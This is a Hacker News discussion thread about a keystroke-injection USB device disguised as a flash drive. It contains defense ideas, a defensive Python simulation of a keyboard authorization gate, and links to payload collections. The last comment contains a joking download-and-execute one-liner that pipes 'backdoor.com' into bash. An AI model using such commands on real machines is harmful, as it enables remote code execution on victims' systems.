
Thought it was a flash drive [video] - cgtyoder
https://www.reddit.com/r/assholedesign/comments/c1aq23/thought_it_was_a_flash_drive/
======
dijit
Hasn't this been known for half-a-decade?

I mean, it's a product you can literally buy and it's impossible to adequately
defend against.

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

https://shop.hak5.org/products/usb-rubber-ducky-deluxe

~~~
notatoad
I've known it was possible, but it's still the first time I'd ever seen a clip
of it actually happening.

And I'm pretty sure using this exploit for totally benign marketing purposes
is a new one.

------
codezero
Jeez, I thought these auto opening usb things were isolated to Windows and
only old versions. What’s the story with this on macOS?

~~~
makepanic
It's a USB keyboard that types some commands to open a hard-coded
website.

You can't really prevent that.

~~~
mikeash
You could require confirmation before accepting a new input device. This could
be done with out of band signaling (such as a button on the computer itself
that you push to say “yes, I want to use this keyboard”) or you could do it by
requiring the user to type in a secret (such as their login password, or even
just a PIN displayed on the screen) to enable it for other uses.

I don’t know that people would accept this inconvenience, though.

~~~
dijit
> or you could do it by requiring the user to type in a secret

How would you accomplish this given that the normal situation is that you're
plugging in a keyboard?

~~~
codezero
I think the implication is you can type on the plugged in keyboard, but the OS
won't pass the input through unless the first thing typed is a secret.

This is somewhat similar to how Bluetooth keyboards are enabled on macOS (or
were the last time I connected one).

~~~
mikeash
Precisely. You get some authorization box and your input only goes to that
box. If you authorize, it then acts like a normal keyboard.
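
The confirmation gate described in this sub-thread, as an added example (not code from any commenter or from a real OS): a simulation in which keystrokes from a newly attached keyboard reach only the authorization prompt until the on-screen code is typed, and are dropped rather than replayed afterwards. `KeyboardGate`, `replay`, the device names and the sample keystrokes are hypothetical and constructed for illustration.

```python
import hmac
import secrets

class KeyboardGate:
    """Holds input from each newly attached keyboard until its on-screen code is typed."""

    def __init__(self, code_len=6, max_attempts=3):
        self.code_len, self.max_attempts = code_len, max_attempts
        self.state = {}  # device id -> {"code", "typed", "attempts", "status"}

    def attach(self, dev):
        """Register a new device; returns the random code the OS would display."""
        code = "".join(secrets.choice("0123456789") for _ in range(self.code_len))
        self.state[dev] = {"code": code, "typed": "", "attempts": 0, "status": "pending"}
        return code

    def key(self, dev, ch):
        """Feed one keystroke; returns the character applications receive, or None."""
        s = self.state[dev]
        if s["status"] == "trusted":
            return ch
        if s["status"] == "blocked":
            return None
        if ch != "\n":
            # Pending input goes to the prompt only and is never replayed later.
            s["typed"] = (s["typed"] + ch)[-64:]
            return None
        ok = hmac.compare_digest(s["typed"].encode(), s["code"].encode())
        s["typed"] = ""
        if ok:
            s["status"] = "trusted"
        else:
            s["attempts"] += 1
            if s["attempts"] >= self.max_attempts:
                s["status"] = "blocked"  # limits blind guessing of the code
        return None

def replay(gate, dev, keystrokes):
    """Return what applications would actually receive from this device."""
    out = (gate.key(dev, k) for k in keystrokes)
    return "".join(c for c in out if c is not None)

# Constructed sample: a device that types blindly and cannot read the screen.
INJECTED = "open https://example.invalid\n"

if __name__ == "__main__":
    gate = KeyboardGate()
    gate.attach("injector")
    print(repr(replay(gate, "injector", INJECTED * 3)), gate.state["injector"]["status"])
    code = gate.attach("human")
    print(repr(replay(gate, "human", code + "\nhello")))
```

The attempt limit matters because a 6-digit code is only a barrier to a device that cannot see the screen if it also cannot keep guessing.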

------
_bxg1
As has been pointed out, you couldn't block this kind of thing without
blocking USB keyboards altogether.

I wonder what it would look like to have a background program that would
detect and intercept any newly connected device by default, give it a fake
(VM?) environment, and log everything it tried to do to the screen while
prompting to ask if you want to let it into the "real" system. Obviously this
is what security professionals do manually, but I'm talking about a totally
transparent and automatic version that could be left running all the time.

~~~
fouronnes3
A simple system like Android fine-grained permissions? <usb device> is asking
to send keyboard input. Allow/Deny?

~~~
Wowfunhappy
This strikes me as the right solution, with two caveats:

• It should allow the keyboard through—or have a timeout that defaults to
"yes"—if a mouse or keyboard is not already connected.

• I should have the option to disable it.

~~~
Gaelan
If there's a monitor, you don't need to trust the first keyboard—just display
a message with "type this [random] code to allow this keyboard."

~~~
Wowfunhappy
I like this, but how do you know the keyboard layout?

~~~
sthgrau
My thought was that it would be an excellent, low knowledge way of figuring
that out. For example, if it said type "qwerty" and it came through as
"azerty", that would get you 95% of the way to having a fully functional
keyboard. Mapping out the requisite keys needed to fully identify the keys
could probably be done with a fairly short number of key presses for 99+% of
likely keyboards.

For this case, I am assuming that the keyboard and OS language are fairly
compatible, at least translatable.

------
fencepost
There are a variety of physical port blockers available as well as devices to
lock cables in place. Some protrude, others are flush and require a key for
removal.

If you have business policies and training in place, hopefully the additional
steps of removing a lock will also provide time for adequate second thoughts
to percolate through those with poor judgment. Malicious actors won't be
seriously deterred, but that's a different matter.

------
snailmailman
Qubes OS has an interesting way of combatting these kinds of attacks. You can
manually attach a usb drive to a specific program VM, limiting the damage
possible by a malicious flash drive.

I want to say it even lets you disable or whitelist usb keyboards/mice
entirely but I’m not 100% certain.

QubesOS is pretty different from other OSes though, I wish those sorts of
device isolation were possible or more easily accomplished in other operating
systems.

------
NikolaeVarius
At Defcon, a buddy of mine screwed around with a Bluetooth HID device that,
when connected to, would automatically attempt to open a webpage and send them
to an innocuous site (which obviously could have been a less innocuous site).

Couldn't believe we got multiple people to connect to it under the guise the
device would do a cool thing.

~~~
swiley
Well it is a cool thing. It’s different and that makes it interesting.

Sometimes I feel like all this worrying about computer security makes it
harder for people to share new things.

~~~
lbotos
Uh, I think you are making an argument against _safety_ and I'm not sure if
you are being sarcastic?

It's one thing to theorize, discuss and build something dangerous, it's
another to actually use it.

See Flamethrowers.

~~~
swiley
Flamethrowers are a great analogy.

Adults who know each other and the dangers well should be (and are) allowed to
play with flamethrowers. I’m not sure I’d want to live in a place where they
couldn’t.

------
fouronnes3
so... <Super>terminal<Enter>wget backdoor.com | bash<Enter>

